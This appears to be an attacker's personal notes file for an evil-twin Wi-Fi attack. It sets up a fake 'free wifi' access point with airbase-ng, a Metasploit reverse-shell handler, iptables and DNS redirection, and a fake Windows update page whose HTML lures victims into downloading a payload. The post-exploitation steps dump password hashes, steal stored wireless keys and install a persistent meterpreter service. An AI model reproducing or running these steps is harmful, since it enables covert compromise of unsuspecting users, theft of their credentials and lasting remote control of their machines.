HM


dhclient wlan0                               //// Connect to the internet, can be eth0


*****Setup metasploit listener*********        ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places  http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit


modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v   ////// can use various commands here

*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1                         ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE         wlan0 = route to the internet
/etc/init.d/dhcp3-server restart                                                      // backtrack users use dhcpd
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'                                           //webserver with fake update page


**********************************************************************
direct any request to apache
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1               //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************

NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v

su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'

cd /                                                                       /// dnspoison available at http://dnspentest.sourceforge.net/
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1

****************************************************************************


**** Check for victims ********
arp -n -v -i at0


session - l
session -i
sysinfo
getuid
use priv
hashdump


***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4                            ///wireless key viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4                            /// executes bat script... check below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4                 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4                        //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt


misc......


wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service


Index html -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
    font-family: Arial, Helvetica, sans-serif;
    font-weight: bold;
    font-size: 24px;
    color: #999999;
}
.style3 {
    font-family: Arial, Helvetica, sans-serif;
    color: #666666;
    font-weight: bold;
}
.style4 {
    font-family: Arial, Helvetica, sans-serif;
    color: #666666;
    font-weight: bold;
    font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>

<body>
<p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">


</p>
<p align="center" class="style2"></p>
<p>&nbsp;</p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
  <label for="D"></label>
</form>
<p align="left" class="style4">&nbsp;</p>
</body>
</html>